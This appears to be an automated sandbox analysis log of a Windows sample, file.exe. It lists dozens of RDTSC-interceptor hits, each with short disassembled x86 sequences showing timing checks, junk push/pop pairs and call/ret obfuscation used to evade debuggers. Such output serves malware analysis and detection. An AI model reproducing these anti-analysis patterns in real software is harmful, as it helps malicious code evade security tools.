                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60D1B9 second address: 60D1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60D1C2 second address: 60D1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60D1C6 second address: 60D1CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61145E second address: 611463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611463 second address: 611469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611469 second address: 611481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B844h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611481 second address: 611491 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 611491 second address: 611495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BBF second address: 5E2BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BC5 second address: 5E2BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B844h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f js 00007F7E2CD3B836h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BE9 second address: 5E2BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BED second address: 5E2BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F7E2CD3B836h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BFB second address: 5E2BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2BFF second address: 5E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 js 00007F7E2CD3B83Eh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1EE3 second address: 5D1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1EE7 second address: 5D1EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1EEB second address: 5D1EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1EF1 second address: 5D1F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7E2CD3B840h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617086 second address: 61708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61733F second address: 61734B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D1EDB second address: 5D1EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617759 second address: 617768 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CD3B838h 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 619730 second address: 619734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 619734 second address: 619738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 619B6D second address: 619B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 619C77 second address: 619C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A3E6 second address: 61A3FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jl 00007F7E2CC83C9Eh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A642 second address: 61A65B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F7E2CD3B844h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F7E2CD3B836h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A98B second address: 61A991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A991 second address: 61A9BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xchg eax, ebx 0x0000000c jng 00007F7E2CD3B854h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CD3B846h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A9BB second address: 61A9CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F7E2CC83C96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B8D8 second address: 61B931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7E2CD3B836h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D2936h], ebx 0x00000017 push 00000000h 0x00000019 jmp 00007F7E2CD3B840h 0x0000001e pushad 0x0000001f mov edi, 6DB40BF5h 0x00000024 mov dword ptr [ebp+122D3C5Dh], eax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d clc 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F7E2CD3B840h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 je 00007F7E2CD3B83Ch 0x0000003d jno 00007F7E2CD3B836h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61E341 second address: 61E354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F7E2CC83C9Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61F521 second address: 61F57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007F7E2CD3B844h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F7E2CD3B838h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 movzx esi, di 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f mov edi, eax 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7E2CD3B848h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6209EB second address: 620A66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7E2CC83C98h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F7E2CC83C98h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov esi, 30D67B93h 0x00000049 or esi, 37623AEAh 0x0000004f push 00000000h 0x00000051 je 00007F7E2CC83CA5h 0x00000057 jmp 00007F7E2CC83C9Fh 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62079A second address: 62079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6214A7 second address: 6214AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6214AB second address: 6214B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D70EB second address: 5D711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CC83C96h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F7E2CC83C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007F7E2CC83C96h 0x0000001e jmp 00007F7E2CC83C9Dh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D711D second address: 5D7121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 626E39 second address: 626E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jnc 00007F7E2CC83C96h 0x0000000f jmp 00007F7E2CC83CA6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E2CC83C9Fh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 627067 second address: 6270F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D2E95h], ebx 0x0000000e ja 00007F7E2CD3B83Ch 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F7E2CD3B838h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 jmp 00007F7E2CD3B842h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov eax, dword ptr [ebp+122D1755h] 0x00000047 mov di, 3D16h 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007F7E2CD3B838h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a je 00007F7E2CD3B83Ch 0x00000070 jp 00007F7E2CD3B836h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 629F83 second address: 629F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62AFAD second address: 62AFC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B845h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62AFC6 second address: 62B029 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F7E2CC83C96h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnp 00007F7E2CC83C9Ch 0x00000013 jmp 00007F7E2CC83C9Ch 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D240Bh], eax 0x00000020 push 00000000h 0x00000022 mov ebx, 5BF1E700h 0x00000027 and edi, dword ptr [ebp+122D2B3Bh] 0x0000002d xchg eax, esi 0x0000002e jl 00007F7E2CC83CB1h 0x00000034 pushad 0x00000035 jl 00007F7E2CC83C96h 0x0000003b jmp 00007F7E2CC83CA3h 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62A1A1 second address: 62A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62B029 second address: 62B02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62A1A5 second address: 62A1AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62B02D second address: 62B031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62B031 second address: 62B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62A1AE second address: 62A1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F7E2CC83C98h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62A1BF second address: 62A1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62A1C5 second address: 62A1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62E3DD second address: 62E459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B848h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7E2CD3B83Ch 0x0000000f jl 00007F7E2CD3B836h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F7E2CD3B838h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 pushad 0x00000034 mov edi, dword ptr [ebp+122D2B8Bh] 0x0000003a movzx esi, cx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 jnc 00007F7E2CD3B83Bh 0x00000046 push 00000000h 0x00000048 add ebx, dword ptr [ebp+122D2D1Bh] 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jno 00007F7E2CD3B83Ch 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62F27A second address: 62F2ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7E2CC83C98h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 clc 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F7E2CC83C98h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jc 00007F7E2CC83C96h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E54C second address: 62E551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F2ED second address: 62F2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630275 second address: 630279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F416 second address: 62F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E2CC83C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630279 second address: 630283 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63118F second address: 631199 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631199 second address: 63120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D2856h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F7E2CD3B838h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D239Bh], ecx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F7E2CD3B838h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d jmp 00007F7E2CD3B840h 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63120C second address: 631219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F7E2CC83C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631219 second address: 63122B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F7E2CD3B836h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632170 second address: 632175 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632175 second address: 6321B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F7E2CD3B83Ah 0x0000000f push 00000000h 0x00000011 mov bx, di 0x00000014 push 00000000h 0x00000016 jg 00007F7E2CD3B841h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 jmp 00007F7E2CD3B83Bh 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6321B3 second address: 6321BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633204 second address: 633209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633209 second address: 633213 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630505 second address: 63051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CD3B83Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63231B second address: 63231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337B second address: 63337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63231F second address: 632325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632325 second address: 63233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B845h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633492 second address: 63349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63567E second address: 635682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636424 second address: 636428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6345D7 second address: 6345EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B844h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632433 second address: 63245B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7E2CC83CA0h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6345EF second address: 6345F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63245B second address: 63245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635770 second address: 635776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
